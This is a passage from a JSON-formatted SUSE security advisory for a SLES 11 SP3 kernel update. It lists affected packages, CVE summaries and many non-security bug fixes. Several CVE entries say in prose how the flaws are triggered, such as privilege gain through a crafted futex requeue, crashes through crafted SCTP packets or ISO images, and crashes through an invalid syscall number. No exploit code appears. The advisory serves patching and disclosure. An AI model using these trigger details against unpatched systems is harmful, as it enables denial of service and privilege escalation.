"https://bugzilla.suse.com/show_bug.cgi?id=860593", "https://bugzilla.suse.com/show_bug.cgi?id=806990", "https://bugzilla.suse.com/show_bug.cgi?id=893596", "https://bugzilla.suse.com/show_bug.cgi?id=882317", "https://bugzilla.suse.com/show_bug.cgi?id=879921", "https://bugzilla.suse.com/show_bug.cgi?id=883376", "https://bugzilla.suse.com/show_bug.cgi?id=888105", "https://bugzilla.suse.com/show_bug.cgi?id=892200", "https://bugzilla.suse.com/show_bug.cgi?id=880370", "https://bugzilla.suse.com/show_bug.cgi?id=887645", "https://bugzilla.suse.com/show_bug.cgi?id=876017", "https://bugzilla.suse.com/show_bug.cgi?id=888849", "https://bugzilla.suse.com/show_bug.cgi?id=884333", "https://bugzilla.suse.com/show_bug.cgi?id=890526", "https://bugzilla.suse.com/show_bug.cgi?id=849123", "https://bugzilla.suse.com/show_bug.cgi?id=880344", "https://bugzilla.suse.com/show_bug.cgi?id=826486", "https://bugzilla.suse.com/show_bug.cgi?id=888968", "https://bugzilla.suse.com/show_bug.cgi?id=885262", "https://bugzilla.suse.com/show_bug.cgi?id=888607", "https://bugzilla.suse.com/show_bug.cgi?id=866615", "https://bugzilla.suse.com/show_bug.cgi?id=881759", "https://bugzilla.suse.com/show_bug.cgi?id=888058", "https://bugzilla.suse.com/show_bug.cgi?id=884725", "https://bugzilla.suse.com/show_bug.cgi?id=882804", "https://bugzilla.suse.com/show_bug.cgi?id=894200", "https://bugzilla.suse.com/show_bug.cgi?id=866130", "https://bugzilla.suse.com/show_bug.cgi?id=889061", "https://bugzilla.suse.com/show_bug.cgi?id=885382", "https://bugzilla.suse.com/show_bug.cgi?id=871797", "https://bugzilla.suse.com/show_bug.cgi?id=866864", "https://bugzilla.suse.com/show_bug.cgi?id=893064", "https://bugzilla.suse.com/show_bug.cgi?id=859840", "https://bugzilla.suse.com/show_bug.cgi?id=876055", "https://bugzilla.suse.com/show_bug.cgi?id=816708", "https://bugzilla.suse.com/show_bug.cgi?id=887082", "https://bugzilla.suse.com/show_bug.cgi?id=885509", "https://bugzilla.suse.com/show_bug.cgi?id=887680", "https://bugzilla.suse.com/show_bug.cgi?id=876114", "http://download.suse.com/patch/finder/?keywords=dc5412c9dbb50ea612d1193ae55a8d38", "https://bugzilla.suse.com/show_bug.cgi?id=893496", "https://bugzilla.suse.com/show_bug.cgi?id=892723", "https://bugzilla.suse.com/show_bug.cgi?id=889173", "https://bugzilla.suse.com/show_bug.cgi?id=885422", "https://bugzilla.suse.com/show_bug.cgi?id=774818", "https://bugzilla.suse.com/show_bug.cgi?id=882900", "https://bugzilla.suse.com/show_bug.cgi?id=884767", "https://bugzilla.suse.com/show_bug.cgi?id=884582", "https://bugzilla.suse.com/show_bug.cgi?id=887608", "https://bugzilla.suse.com/show_bug.cgi?id=889727", "https://bugzilla.suse.com/show_bug.cgi?id=886840", "https://bugzilla.suse.com/show_bug.cgi?id=892490", "https://bugzilla.suse.com/show_bug.cgi?id=891259", "http://download.suse.com/patch/finder/?keywords=e0773faf1a29419cf53084e7aa8fa6f1", "https://bugzilla.suse.com/show_bug.cgi?id=869055", "https://bugzilla.suse.com/show_bug.cgi?id=888591", "https://bugzilla.suse.com/show_bug.cgi?id=891619", "https://bugzilla.suse.com/show_bug.cgi?id=888847", "https://bugzilla.suse.com/show_bug.cgi?id=889614", "https://bugzilla.suse.com/show_bug.cgi?id=860441", "https://bugzilla.suse.com/show_bug.cgi?id=883724", "https://bugzilla.suse.com/show_bug.cgi?id=832309", "https://bugzilla.suse.com/show_bug.cgi?id=883518", "https://bugzilla.suse.com/show_bug.cgi?id=881051", "https://bugzilla.suse.com/show_bug.cgi?id=876590", "https://bugzilla.suse.com/show_bug.cgi?id=890513", "https://bugzilla.suse.com/show_bug.cgi?id=887503", "https://bugzilla.suse.com/show_bug.cgi?id=882639", "https://bugzilla.suse.com/show_bug.cgi?id=889451", "https://bugzilla.suse.com/show_bug.cgi?id=890297", "https://bugzilla.suse.com/show_bug.cgi?id=870161", "https://bugzilla.suse.com/show_bug.cgi?id=869934", "https://bugzilla.suse.com/show_bug.cgi?id=863586", "https://bugzilla.suse.com/show_bug.cgi?id=890426"], "affectedPackage": [{"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "arch": "x86_64", "packageFilename": "cluster-network-kmp-bigsmp-1.4_3.0.101_0.40-2.27.98.x86_64.rpm", "packageName": "cluster-network-kmp-bigsmp", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-extra-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "arch": "x86_64", "packageFilename": "ocfs2-kmp-bigsmp-1.6_3.0.101_0.40-0.20.98.x86_64.rpm", "packageName": "ocfs2-kmp-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "2.0.5_3.0.101_0.40-7.39.89", "arch": "x86_64", "packageFilename": "oracleasm-kmp-bigsmp-2.0.5_3.0.101_0.40-7.39.89.x86_64.rpm", "packageName": "oracleasm-kmp-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "arch": "x86_64", "packageFilename": "kernel-bigsmp-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.5.4.1_3.0.101_0.40-0.13.89", "arch": "x86_64", "packageFilename": "ofed-kmp-bigsmp-1.5.4.1_3.0.101_0.40-0.13.89.x86_64.rpm", "packageName": "ofed-kmp-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.4.20_3.0.101_0.40-0.38.83", "arch": "x86_64", "packageFilename": "iscsitarget-kmp-bigsmp-1.4.20_3.0.101_0.40-0.38.83.x86_64.rpm", "packageName": "iscsitarget-kmp-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "arch": "x86_64", "packageFilename": "gfs2-kmp-bigsmp-2_3.0.101_0.40-0.16.104.x86_64.rpm", "packageName": "gfs2-kmp-bigsmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "8.4.4_3.0.101_0.40-0.22.64", "arch": "x86_64", "packageFilename": "drbd-kmp-bigsmp-8.4.4_3.0.101_0.40-0.22.64.x86_64.rpm", "packageName": "drbd-kmp-bigsmp", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel has been updated to fix\n various bugs and security issues.\n\n The following security bugs have been fixed:\n\n *\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to\n obtain sensitive information from kernel memory by leveraging\n /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call\n (bnc#882804).\n\n *\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does\n not properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n *\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel\n through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled\n and the sep CPU feature flag is set, allows local users to cause a denial\n of service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n *\n\n CVE-2014-4667: The sctp_association_free function in\n net/sctp/associola.c in the Linux kernel before 3.15.2 does not properly\n manage a certain backlog value, which allows remote attackers to cause a\n denial of service (socket outage) via a crafted SCTP packet (bnc#885422).\n\n *\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\n Linux kernel through 3.15.6 allows local users to gain privileges by\n leveraging data-structure differences between an l2tp socket and an inet\n socket (bnc#887082).\n\n *\n\n CVE-2014-5077: The sctp_assoc_update function in\n net/sctp/associola.c in the Linux kernel through 3.15.8, when SCTP\n authentication is enabled, allows remote attackers to cause a denial of\n service (NULL pointer dereference and OOPS) by starting to establish an\n association between two endpoints immediately after an exchange of INIT\n and INIT ACK chunks to establish an earlier association between these\n endpoints in the opposite direction (bnc#889173).\n\n *\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n *\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n *\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n *\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n *\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the\n Linux kernel through 3.14.5 does not ensure that calls have two different\n futex addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n *\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs have been fixed:\n\n * ACPI / PAD: call schedule() when need_resched() is true (bnc#866911).\n * ACPI: Fix bug when ACPI reset register is implemented in system\n memory (bnc#882900).\n * ACPI: Limit access to custom_method (bnc#884333).\n * ALSA: hda - Enabling Realtek ALC 671 codec (bnc#891746).\n * Add option to automatically enforce module signatures when in Secure\n Boot mode (bnc#884333).\n * Add secure_modules() call (bnc#884333).\n * Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344).\n * Backported new patches of Lock down functions for UEFI secure boot\n Also updated series.conf and removed old patches.\n * Btrfs: Return EXDEV for cross file system snapshot.\n * Btrfs: abort the transaction when we does not find our extent ref.\n * Btrfs: avoid warning bomb of btrfs_invalidate_inodes.\n * Btrfs: cancel scrub on transaction abortion.\n * Btrfs: correctly set profile flags on seqlock retry.\n * Btrfs: does not check nodes for extent items.\n * Btrfs: fix a possible deadlock between scrub and transaction\n committing.\n * Btrfs: fix corruption after write/fsync failure + fsync + log\n recovery (bnc#894200).\n * Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619).\n * Btrfs: fix double free in find_lock_delalloc_range.\n * Btrfs: fix possible memory leak in btrfs_create_tree().\n * Btrfs: fix use of uninit "ret" in end_extent_writepage().\n * Btrfs: free delayed node outside of root->inode_lock (bnc#866864).\n * Btrfs: make DEV_INFO ioctl available to anyone.\n * Btrfs: make FS_INFO ioctl available to anyone.\n * Btrfs: make device scan less noisy.\n * Btrfs: make sure there are not any read requests before stopping\n workers.\n * Btrfs: more efficient io tree navigation on wait_extent_bit.\n * Btrfs: output warning instead of error when loading free space cache\n failed.\n * Btrfs: retrieve more info from FS_INFO ioctl.\n * Btrfs: return EPERM when deleting a default subvolume (bnc#869934).\n * Btrfs: unset DCACHE_DISCONNECTED when mounting default subvol\n (bnc#866615).\n * Btrfs: use right type to get real comparison.\n * Btrfs: wake up @scrub_pause_wait as much as we can.\n * Btrfs: wake up transaction thread upon remount.\n * CacheFiles: Add missing retrieval completions (bnc#880344).\n * CacheFiles: Does not try to dump the index key if the cookie has\n been cleared (bnc#880344).\n * CacheFiles: Downgrade the requirements passed to the allocator\n (bnc#880344).\n * CacheFiles: Fix the marking of cached pages (bnc#880344).\n * CacheFiles: Implement invalidation (bnc#880344).\n * CacheFiles: Make some debugging statements conditional (bnc#880344).\n * Drivers: hv: util: Fix a bug in the KVP code (bnc#886840).\n * Drivers: hv: vmbus: Fix a bug in the channel callback dispatch code\n (bnc#886840).\n * FS-Cache: Add transition to handle invalidate immediately after\n lookup (bnc#880344).\n * FS-Cache: Check that there are no read ops when cookie relinquished\n (bnc#880344).\n * FS-Cache: Clear remaining page count on retrieval cancellation\n (bnc#880344).\n * FS-Cache: Convert the object event ID #defines into an enum\n (bnc#880344).\n * FS-Cache: Does not sleep in page release if __GFP_FS is not set\n (bnc#880344).\n * FS-Cache: Does not use spin_is_locked() in assertions (bnc#880344).\n * FS-Cache: Exclusive op submission can BUG if there is been an I/O\n error (bnc#880344).\n * FS-Cache: Fix __wait_on_atomic_t() to call the action func if the\n counter != 0 (bnc#880344).\n * FS-Cache: Fix object state machine to have separate work and wait\n states (bnc#880344).\n * FS-Cache: Fix operation state management and accounting (bnc#880344).\n * FS-Cache: Fix signal handling during waits (bnc#880344).\n * FS-Cache: Initialise the object event mask with the calculated mask\n (bnc#880344).\n * FS-Cache: Limit the number of I/O error reports for a cache\n (bnc#880344).\n * FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344).\n * FS-Cache: Mark cancellation of in-progress operation (bnc#880344).\n * FS-Cache: One of the write operation paths doeses not set the object\n state (bnc#880344).\n * FS-Cache: Provide proper invalidation (bnc#880344).\n * FS-Cache: Simplify cookie retention for fscache_objects, fixing oops\n (bnc#880344).\n * FS-Cache: The retrieval remaining-pages counter needs to be atomic_t\n (bnc#880344).\n * FS-Cache: Uninline fscache_object_init() (bnc#880344).\n * FS-Cache: Wrap checks on object state (bnc#880344).\n * HID: usbhid: add always-poll quirk (bnc#888607).\n * HID: usbhid: enable always-poll quirk for Elan Touchscreen\n (bnc#888607).\n * IB/iser: Add TIMEWAIT_EXIT event handling (bnc#890297).\n * Ignore "flags" change to event_constraint (bnc#876114).\n * Ignore data_src/weight changes to perf_sample_data (bnc#876114).\n * NFS: Allow more operations in an NFSv4.1 request (bnc#890513).\n * NFS: Clean up helper function nfs4_select_rw_stateid() (bnc#888968).\n * NFS: Does not copy read delegation stateids in setattr (bnc#888968).\n * NFS: Does not use a delegation to open a file when returning that\n delegation (bnc#888968, bnc#892200, bnc#893596, bnc#893496)\n * NFS: Fixes for NFS RCU-walk support in line with code going upstream\n * NFS: Use FS-Cache invalidation (bnc#880344).\n * NFS: allow lockless access to access_cache (bnc#866130).\n * NFS: avoid mountpoint being displayed as " (deleted)" in\n /proc/mounts (bnc#888591).\n * NFS: nfs4_do_open should add negative results to the dcache\n (bnc#866130).\n * NFS: nfs_migrate_page() does not wait for FS-Cache to finish with a\n page (bnc#880344).\n * NFS: nfs_open_revalidate: only evaluate parent if it will be used\n (bnc#866130).\n * NFS: prepare for RCU-walk support but pushing tests later in code\n (bnc#866130).\n * NFS: support RCU_WALK in nfs_permission() (bnc#866130).\n * NFS: teach nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130).\n * NFS: teach nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130).\n * NFSD: Does not hand out delegations for 30 seconds after recalling\n them (bnc#880370).\n * NFSv4 set open access operation call flag in nfs4_init_opendata_res\n (bnc#888968, bnc#892200, bnc#893596, bnc#893496).\n * NFSv4: Add a helper for encoding opaque data (bnc#888968).\n * NFSv4: Add a helper for encoding stateids (bnc#888968).\n * NFSv4: Add helpers for basic copying of stateids (bnc#888968).\n * NFSv4: Clean up nfs4_select_rw_stateid() (bnc#888968).\n * NFSv4: Fix the return value of nfs4_select_rw_stateid (bnc#888968).\n * NFSv4: Rename nfs4_copy_stateid() (bnc#888968).\n * NFSv4: Resend the READ/WRITE RPC call if a stateid change causes an\n error (bnc#888968).\n * NFSv4: Simplify the struct nfs4_stateid (bnc#888968).\n * NFSv4: The stateid must remain the same for replayed RPC calls\n (bnc#888968).\n * NFSv4: nfs4_stateid_is_current should return "true" for an invalid\n stateid (bnc#888968).\n * One more fix for kABI breakage.\n * PCI: Lock down BAR access when module security is enabled\n (bnc#884333).\n * PCI: enable MPS "performance" setting to properly handle bridge MPS\n (bnc#883376).\n * PM / Hibernate: Add memory_rtree_find_bit function (bnc#860441).\n * PM / Hibernate: Create a Radix-Tree to store memory bitmap\n (bnc#860441).\n * PM / Hibernate: Implement position keeping in radix tree\n (bnc#860441).\n * PM / Hibernate: Iterate over set bits instead of PFNs in\n swsusp_free() (bnc#860441).\n * PM / Hibernate: Remove the old memory-bitmap implementation\n (bnc#860441).\n * PM / Hibernate: Touch Soft Lockup Watchdog in rtree_next_node\n (bnc#860441).\n * Restrict /dev/mem and /dev/kmem when module loading is restricted\n (bnc#884333).\n * Reuse existing "state" field to indicate PERF_X86_EVENT_PEBS_LDLAT\n (bnc#876114).\n * USB: handle LPM errors during device suspend correctly (bnc#849123).\n * Update kabi files to reflect fscache change (bnc#880344)\n * Update x86_64 config files: re-enable SENSORS_W83627EHF (bnc#891281)\n * VFS: Make more complete truncate operation available to CacheFiles\n (bnc#880344).\n * [FEAT NET1222] ib_uverbs: Allow explicit mmio trigger (FATE#83366,\n ltc#83367).\n * acpi: Ignore acpi_rsdp kernel parameter when module loading is\n restricted (bnc#884333).\n * af_iucv: correct cleanup if listen backlog is full (bnc#885262,\n LTC#111728).\n * asus-wmi: Restrict debugfs interface when module loading is\n restricted (bnc#884333).\n * autofs4: allow RCU-walk to walk through autofs4 (bnc#866130).\n * autofs4: avoid taking fs_lock during rcu-walk (bnc#866130).\n * autofs4: does not take spinlock when not needed in\n autofs4_lookup_expiring (bnc#866130).\n * autofs4: factor should_expire() out of autofs4_expire_indirect\n (bnc#866130).\n * autofs4: make "autofs4_can_expire" idempotent (bnc#866130).\n * autofs4: remove a redundant assignment (bnc#866130).\n * autofs: fix lockref lookup (bnc#888591).\n * be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759).\n * block: add cond_resched() to potentially long running ioctl discard\n loop (bnc#884725).\n * block: fix race between request completion and timeout handling\n (bnc#881051).\n * cdc-ether: clean packet filter upon probe (bnc#876017).\n * cpuset: Fix memory allocator deadlock (bnc#876590).\n * crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not all archs\n have them, but some are FIPS certified, with some kernel support.\n * crypto: fips - only panic on bad/missing crypto mod signatures\n (bnc#887503).\n * crypto: testmgr - allow aesni-intel and ghash_clmulni-intel in fips\n mode (bnc#889451).\n * dasd: validate request size before building CCW/TCW (bnc#891087,\n LTC#114068).\n * dm mpath: fix race condition between multipath_dtr and pg_init_done\n (bnc#826486).\n * dm-mpath: fix panic on deleting sg device (bnc#870161).\n * drm/ast: AST2000 cannot be detected correctly (bnc#895983).\n * drm/ast: Actually load DP501 firmware when required (bnc#895608\n bnc#871134).\n * drm/ast: Add missing entry to dclk_table[].\n * drm/ast: Add reduced non reduced mode parsing for wide screen mode\n (bnc#892723).\n * drm/ast: initial DP501 support (v0.2) (bnc#871134).\n * drm/ast: open key before detect chips (bnc#895983).\n * drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304).\n * drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064).\n * drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init\n (bnc#869055).\n * drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055).\n * drm/i915: use FPGA_DBG for the "unclaimed register" checks\n (bnc#869055).\n * drm/mgag200: Initialize data needed to map fbdev memory (bnc\n #806990).\n * e1000e: enable support for new device IDs (bnc#885509).\n * fs/fscache: remove spin_lock() from the condition in while()\n (bnc#880344).\n * hibernate: Disable in a signed modules environment (bnc#884333).\n * hugetlb: does not use ERR_PTR with VM_FAULT* values\n * ibmvscsi: Abort init sequence during error recovery (bnc#885382).\n * ibmvscsi: Add memory barriers for send / receive (bnc#885382).\n * inet: add a redirect generation id in inetpeer (bnc#860593).\n * inetpeer: initialize ->redirect_genid in inet_getpeer() (bnc#860593).\n * ipv6: tcp: fix tcp_v6_conn_request() (bnc#887645).\n * kabi: hide bnc#860593 changes of struct inetpeer_addr_base\n (bnc#860593).\n * kernel: 3215 tty hang (bnc#891087, LTC#114562).\n * kernel: fix data corruption when reading /proc/sysinfo (bnc#891087,\n LTC#114480).\n * kernel: fix kernel oops with load of fpc register (bnc#889061,\n LTC#113596).\n * kernel: sclp console tty reference counting (bnc#891087, LTC#115466).\n * kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333).\n * md/raid6: avoid data corruption during recovery of double-degraded\n RAID6.\n * memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim\n fix).\n * memcg: do not expose uninitialized mem_cgroup_per_node to world\n (bnc#883096).\n * mm, hugetlb: add VM_NORESERVE check in vma_has_reserves()\n * mm, hugetlb: change variable name reservations to resv\n * mm, hugetlb: decrement reserve count if VM_NORESERVE alloc page cache\n * mm, hugetlb: defer freeing pages when gathering surplus pages\n * mm, hugetlb: do not use a page in page cache for cow optimization\n * mm, hugetlb: fix and clean-up node iteration code to alloc or free\n * mm, hugetlb: fix race in region tracking\n * mm, hugetlb: fix subpool accounting handling\n * mm, hugetlb: improve page-fault scalability\n * mm, hugetlb: improve, cleanup resv_map parameters\n * mm, hugetlb: move up the code which check availability of free huge\n page\n * mm, hugetlb: protect reserved pages when soft offlining a hugepage\n * mm, hugetlb: remove decrement_hugepage_resv_vma()\n * mm, hugetlb: remove redundant list_empty check in\n gather_surplus_pages()\n * mm, hugetlb: remove resv_map_put\n * mm, hugetlb: remove useless check about mapping type\n * mm, hugetlb: return a reserved page to a reserved pool if failed\n * mm, hugetlb: trivial commenting fix\n * mm, hugetlb: unify region structure handling\n * mm, hugetlb: unify region structure handling kabi\n * mm, hugetlb: use long vars instead of int in region_count() (Hugetlb\n Fault Scalability).\n * mm, hugetlb: use vma_resv_map() map types\n * mm, oom: fix badness score underflow (bnc#884582, bnc#884767).\n * mm, oom: normalize oom scores to oom_score_adj scale only for\n userspace (bnc#884582, bnc#884767).\n * mm, thp: do not allow thp faults to avoid cpuset restrictions\n (bnc#888849).\n * net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680).\n * net/mlx4_core: Load the IB driver when the device supports IBoE\n (bnc#887680).\n * net/mlx4_en: Fix a race between napi poll function and RX ring\n cleanup (bnc#863586).\n * net/mlx4_en: Fix selftest failing on non 10G link speed (bnc#888058).\n * net: fix checksumming features handling in output path (bnc#891259).\n * pagecache_limit: batch large nr_to_scan targets (bnc#895221).\n * pagecachelimit: reduce lru_lock congestion for heavy parallel\n reclaim fix (bnc#895680).\n * perf/core: Add weighted samples (bnc#876114).\n * perf/x86: Add flags to event constraints (bnc#876114).\n * perf/x86: Add memory profiling via PEBS Load Latency (bnc#876114).\n * perf: Add generic memory sampling interface (bnc#876114).\n * qla2xxx: Avoid escalating the SCSI error handler if the command is\n not found in firmware (bnc#859840).\n * qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840).\n * qla2xxx: Does not check for firmware hung during the reset context\n for ISP82XX (bnc#859840).\n * qla2xxx: Issue abort command for outstanding commands during cleanup\n when only firmware is alive (bnc#859840).\n * qla2xxx: Reduce the time we wait for a command to complete during\n SCSI error handling (bnc#859840).\n * qla2xxx: Set host can_queue value based on available resources\n (bnc#859840).\n * restore smp_mb() in unlock_new_inode() (bnc#890526).\n * s390/pci: introduce lazy IOTLB flushing for DMA unmap (bnc#889061,\n LTC#113725).\n * sched: fix the theoretical signal_wake_up() vs schedule() race\n (bnc#876055).\n * sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035).\n * scsi_dh: use missing accessor "scsi_device_from_queue" (bnc#889614).\n * scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail (bnc#887608).\n * scsiback: correct grant page unmapping.\n * scsiback: fix retry handling in __report_luns().\n * scsiback: free resources after error.\n * sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130).\n * supported.conf: remove external from drivers/net/veth (bnc#889727)\n * supported.conf: support net/sched/act_police.ko (bnc#890426)\n * tcp: adapt selected parts of RFC 5682 and PRR logic (bnc#879921).\n * tg3: Change nvram command timeout value to 50ms (bnc#855657).\n * tg3: Override clock, link aware and link idle mode during NVRAM dump\n (bnc#855657).\n * tg3: Set the MAC clock to the fastest speed during boot code load\n (bnc#855657).\n * usb: Does not enable LPM if the exit latency is zero (bnc#832309).\n * usbcore: Does not log on consecutive debounce failures of the same\n port (bnc#888105).\n * usbhid: fix PIXART optical mouse (bnc#888607).\n * uswsusp: Disable when module loading is restricted (bnc#884333).\n * vscsi: support larger transfer sizes (bnc#774818).\n * writeback: Do not sync data dirtied after sync start (bnc#833820).\n * x86 thermal: Delete power-limit-notification console messages\n (bnc#882317).\n * x86 thermal: Disable power limit notification interrupt by default\n (bnc#882317).\n * x86 thermal: Re-enable power limit notification interrupt by default\n (bnc#882317).\n * x86, cpu hotplug: Fix stack frame warning in\n check_irq_vectors_for_cpu_disable() (bnc#887418).\n * x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847).\n * x86/UV: Add kdump to UV NMI handler (bnc#888847).\n * x86/UV: Add summary of cpu activity to UV NMI handler (bnc#888847).\n * x86/UV: Move NMI support (bnc#888847).\n * x86/UV: Update UV support for external NMI signals (bnc#888847).\n * x86/uv/nmi: Fix Sparse warnings (bnc#888847).\n * x86: Add check for number of available vectors before CPU down\n (bnc#887418).\n * x86: Lock down IO port access when module security is enabled\n (bnc#884333).\n * x86: Restrict MSR access when module loading is restricted\n (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" 